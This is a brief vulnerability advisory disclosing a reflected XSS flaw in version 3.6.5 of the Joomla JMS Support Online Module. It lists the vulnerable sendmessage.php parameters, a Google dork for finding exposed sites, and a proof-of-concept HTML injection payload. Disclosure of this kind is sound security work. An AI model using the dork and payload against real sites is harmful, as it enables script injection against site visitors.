Joomla JMS Support Online Module component version 3.6.5 suffers from a cross site scripting vulnerability.
eae018801eae842408a2605b94fdd00002efad9133ce39cb1a797bdf86ac7fdd
Exploit Title : Joomla JMS Support Online Module Reflected XSS - skype
extension
Google Dork : inurl:sendmessage.php?type=skype
Date : 12/02/2017
Exploit Author : Marc Castejon <marc@silentbreach.com>
Vendor Homepage : https://www.joommasters.com
Version: 3.6.5
Type : webapps
Platform: Joomla
------------------------------------------------
Type: Reflected XSS
Vulnerable URL:http://localhost/[PATH]/sendmessage.php
Vulnerable Parameters: ?type=skype&user=<vulnerable>&skype=<vulnerable>
Method: GET
Payload: "><img src=i onerror=prompt(2)>